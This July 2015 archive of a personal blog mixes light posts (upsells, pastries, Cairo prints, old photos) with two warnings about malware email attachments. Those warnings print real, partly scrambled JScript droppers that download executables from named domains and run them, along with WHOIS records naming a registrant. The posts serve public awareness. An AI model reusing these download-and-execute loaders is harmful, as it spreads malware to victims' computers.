Monthly Archives: July 2015

The King of the Upsells

Posted on by The Old Wolf

Now that the birthday has passed, the story can be told.

I went to F.Y.E. to buy a CD for my wife. I take my purchase to the register.

First Up:

Salesgirl: “Do you want to sign up for the F.Y.E. Backstage Pass? It’s free for the first month!”
Me: “How much is it after the first month?”
Salesgirl: “Only $11.95 per month thereafter.”
Me: “No, thank you.”

Apparently FYE has not had good press regarding their “Backstage Pass.”

Next:

Salesgirl: “Would you be interested in the CD replacement warranty today?”
Me: “No thanks.” (I didn’t even bother to ask how much extra profit they wanted on this one.)

Next:

Salesgirl: Pointing to a display of potential magazine subscriptions taped to the counter, the kind you’d find lying around in a substandard doctor’s office – People, Vogue, Cosmo, etc. “Would you like to buy a subscription to any of these magazines?”
Me: “No thanks.”

Next: (Will this ever end?)

Salesgirl: Pointing to a discount bin by the register: “Would you be interested in any of these fine movies for only $5.00?
Me: “No thanks.”

What I really wanted to say was, “Holy hqiz, girl, I only came in to buy one album. At least at McDonald’s they only ask you “Do you want fries with that?”

And the sad part is that these sales associates get graded on how many upsells they make, and probably have a regular quota to meet. I can’t imagine how many people they drive away with this relentless drive for nickels and dimes. Frankly I’m surprised they stay in business.

The Old Wolf has spoken.

“He takes them to a pastry shop to eat some good cakes.”

Posted on by The Old Wolf

For as long as I can remember – my very earliest reading days in the 50s – Babar was one of my favorite children’s books. I always loved this page, where Babar takes his two little cousins Arthur and Celeste to a patisserie… those pastries always looked so good to me, and my mother had already introduced me to the delights of brioches.

Babar

Yesterday was my wife’s birthday, and we spent the day doing a massive Yarn Hop around the local yarn stores of Salt Lake, but before heading home, we stopped in at “Gourmandise,” a French bakery/café that sits at 250 South 300 East, right where the original Ratskeller Pizza Shoppe used to be.

gourmandise

Photo from their website

That display of pastries and other goodies is Babar come to life for me, and the quality is every bit what I would expect. (No, they’e not paying me for this post.)

Here are two of the goodies we brought home last night, the other two were devoured before I thought of writing this, and they were absolutely divine.

Pastries

Yes, they’re pricey – but you don’t find stuff like this for a buck and a quarter at Smith’s. It’s probably a very good thing that I’m not wealthy enough or close enough to patronize these guys on a regular basis, or I’d look like Fat Albert.

The Old Wolf has *belch*  spoken.

Six Views of Cairo – Robert Hay

Posted on by The Old Wolf

The six lithographs below were published by the American University in Cairo Press in 1983. They were found among my mother’s possessions; she spent years in Egypt on various assignments from World War II to the 1970s.

Description

A - Sabil Kuttab

Description A

B - Bab Zuwayla

Description B

C - Bayn Al Qasrayn

Description C

D - Minaret, Ibn Tulun

Description D

E - A Circumcision Procession

Description E

F - Barquq Mosque

Description F

What would be really interesting would be some contemporary street scenes from Cairo showing what these locales look like today.

The Old Wolf has spoken.

Order to Appear in Court

Posted on by The Old Wolf

Nothing to see here, folks, just move along. Another scam email from fraudsters trying to get me to download malware to my computer.

This time the Javascript code wants to go out to startick.com, mrflapper.com, and ihaveavoice2.com (all of which are invalid top-level domains), and then download and install other nasty stuff to my computer.

Here’s the email that this came attached to:

To: [edited]
Subject: Notice of appearance in Court #00928994

From: “District Court” <jimmie.cowan@138-172.static.hkit4u.com>
Notice to Appear,
You have to appear in the Court on the July 27.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Sincerely,
Jimmie Cowan,
Clerk of Court.
Attached: Notice_to_Appear_00928994.zip
That “notice to appear” attachment is actually a JavaScript file, and it came as garbage that looked like this:

function sah126() { return ’00) {‘; };  function sah125() { return ‘ == 2’; };  function sah210() { return ‘+fr+’; }; function sah86() { return ‘ar dn’; };  function sah105() { return ‘rea’; };  function sah95() { return ‘bj’; };

But as soon as the code runs, it concatenates all those little bits into something that looks like this:

var stroke=”55565C5E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function gvi() { return ‘e’; }

function sah() { return ‘val’; }

function dl(fr)l”); v { var b = “w’; };

ww.startick.com mrflapper.com ihaveavoice2.com”.split’; };

(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shelar fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; };’; };

try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(4851); dl(5382); dl(2753);var po = ”

for (var ckz=1; ckz<=242; ckz++) { po += this[‘sah’+ckz](); } this[gvi()+sah()](po);

I’ve mentioned these a few times before – the only way to keep yourself safe is to never open attachments you receive in email messages unless you are 100% sure whom they are from and what they are.

The bad actors want access to your data and your computer, and they don’t care how they get it.

Be careful out there.

The Old Wolf has spoken.

1911 – Hot town, summer in the city

Posted on by The Old Wolf

maxresdefault

Heat wave in New York. July 6, 1911. “Licking blocks of ice on a hot day.” 5×7 glass negative, George Grantham Bain Collection.

Found at Shorpy.

New York can get blistering hot when a heat wave rolls through. I experienced a number of days like this when I was growing up there. And I’m old enough to remember the ice man with his truck, and an electric crusher on the back so he could deliver chips as well as the blocks.

Our neighborhood didn’t get ice deliveries, those were mostly down in the village if I remember correctly. But I do recall that close to my home was a playground with one of these:

sprinklerball

It was a great way to cool off on a hot summer day. I’m glad there are still water attractions around to help kids stay cool in the summer heat.

The Old Wolf has spoken.

Spam from China

Posted on by The Old Wolf

Chinese Spam

Why would anyone in their right mind respond to a mail blast like this, especially when it’s in Chinese?

尊敬的客户: 您好! 祝您业务更上一层楼。 我司十多年专为中小企业提供香港公司注册服务。在2014年在香港成立的公司有167279间,在2013年在香港成立的公司有174030间,在经济环境越不好的情况下,老板们更热衷研究并注册离岸公司。在香港成立公司是很简单的事情,两个星期多便可以注册完成,注册资本不需要验资,不需要到位,阁下也不需要到香港。在这些年,我们一直在埋头苦干,精心修炼,力争为您提供更专业的离岸注册服务。一直期待着您的联系。      希望! 本邮件是我们合作的开始.

———

English via Google Translate:

Dear Customer: Hello! I wish your business to the next level. Our ten years designed to provide SMEs in Hong Kong Companies Registry services. The company was established in 2014 in Hong Kong, there are 167,279 in the company in 2013 in Hong Kong has 174,030, in the worse economic environment, the owners are more keen to study and register offshore companies. Set up a company in Hong Kong is a very simple matter, more will be able to register two weeks to complete, registered capital does not require verification, no place, you do not need to go to Hong Kong. During these years, we have been working hard, careful cultivation, strive to provide you with more professional offshore registration services. We have been looking forward to your contact.I hope! This message is the beginning of our cooperation.

Unless they’re targeting people in the mainland, this seems like a phenomenally inefficient way of doing business. On the other hand, it could just be a phishing scam looking for the dumbest of the dumb.

The amount of business that is being done in the world based on dishonesty and deception makes my head hurt.

The Old Wolf has spoken.

The ‘10,000 Calorie Sundae’

Posted on by The Old Wolf

gZsSS5e

The image above shows two young girls purchasing a so-called “10,000-calorie sundae” from Blair Parson’s store in Lynchburg, Virginia, sometime in the 1950s. Price: 35¢.

Odds are that this was some marketing license; the average hot fudge sundae comes in at about 284 calories, and these don’t look like killers. But it’s a cute picture.

Another package of Javascript malware

Posted on by The Old Wolf

mon

I wish I were a javascript programmer.

Here’s the code that came to me via email in a .zip file, under the malicious guise of a FedEx delivery label (it was packaged to look like the code you see in my previous post.)

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function cwm() { return ‘e’; };

function xn() { return ‘val’; };

function dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com soflectplit(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er)) { return ‘.c {}; if (dn == 1) break; } }; dl(7) { return ‘om”.s971); dl(6202’; };  var xv = ”; ); dl(613);

for (var rlh=1; rlh<=225; rlh++) { xv += this[‘xn’+rlh](); } this[cwm()+xn()](xv);

The email:

To: info@academyofgreatness.com
Subject: Problems with item delivery, n.00000732560

From: “FedEx International MailService” <seth.mcdowell@77.241.83.157.static.hosted.by.combell.com>

Dear Customer,

We could not deliver your item.
Please, download Delivery Label attached to this email.
Yours faithfully,
Seth Mcdowell,
Operation Manager.
FedEx_ID_00000732560.zip
 I have said before and will say cheerfully again, Don’t Open Attachments from People You Don’t Know. Just don’t. Files labelled .zip, .exe, .js, or even .doc, .pdf, and others can be malicious. Sadly, too many people suppress the display of file extensions on their machine, because that’s the default Microsoft has herded people into, and it’s dangerous.
The script above goes out to two websites, “dickinsonwrestlingclub.com” which redirects to a Facebook page, and etqy.com. The registration of the first hides behind a privacy wall:
Domain Name: DICKINSONWRESTLINGCLUB.COM
Registry Domain ID: 336832356_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2015-01-29T00:13:33Z
Creation Date: 2006-02-06T15:11:04Z
Registrar Registration Expiration Date: 2017-02-06T05:00:00Z
Registrar: NETWORK SOLUTIONS, LLC.
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 12808 Gran Bay Parkway West
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32258
Registrant Country: US
Registrant Phone: +1.5707088780
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: h72bn4775k5@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 12808 Gran Bay Parkway West
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32258
Admin Country: US
Admin Phone: +1.5707088780
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: h72bn4775k5@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 12808 Gran Bay Parkway West
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32258
Tech Country: US
Tech Phone: +1.5707088780
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: h72bn4775k5@networksolutionsprivateregistration.com
Name Server: NS1.CTCTEL.COM
Name Server: NS2.CTCTEL.COM
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
The second is registered to someone in Turkey:
Domain Name: etqy.com
Registry Domain ID: 1527531270_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.srsplus.com
Registrar URL: http://srsplus.com
Updated Date: 2014-03-13T20:56:39Z
Creation Date: 2008-11-07T19:15:39Z
Registrar Registration Expiration Date: 2015-11-07T19:15:39Z
Registrar: TLDS LLC. d/b/a SRSPlus
Registrar IANA ID: 320
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8773812449
Reseller:
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Ferhat Yilmaz
Registrant Organization:
Registrant Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Registrant City: Istanbul
Registrant State/Province: none
Registrant Postal Code: 34724
Registrant Country: TR
Registrant Phone: +90.90211
Registrant Phone Ext.:
Registrant Fax:
Registrant Fax Ext.:
Registrant Email: info@etqy.com
Registry Admin ID:
Admin Name: Ferhat Yilmaz
Admin Organization:
Admin Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Admin City: Istanbul
Admin State/Province: none
Admin Postal Code: 34724
Admin Country: TR
Admin Phone: +90.90211
Admin Phone Ext.:
Admin Fax:
Admin Fax Ext.:
Admin Email: info@etqy.com
Registry Tech ID:
Tech Name: Ferhat Yilmaz
Tech Organization:
Tech Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Tech City: Istanbul
Tech State/Province: none
Tech Postal Code: 34724
Tech Country: TR
Tech Phone: +90.90211
Tech Phone Ext.:
Tech Fax:
Tech Fax Ext.:
Tech Email: info@etqy.com
Name Server: ns51.1and1.com
Name Server: ns52.1and1.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

The code goes out to these websites and downloads other files, and then runs them. What will happen to your computer next is anyone’s guess. That’s why I wish I knew javascript better, so I could determine exactly what was being downloaded and what it is supposed to do.

Whatever the case, stay away from attachments in your email.

The Old Wolf has spoken.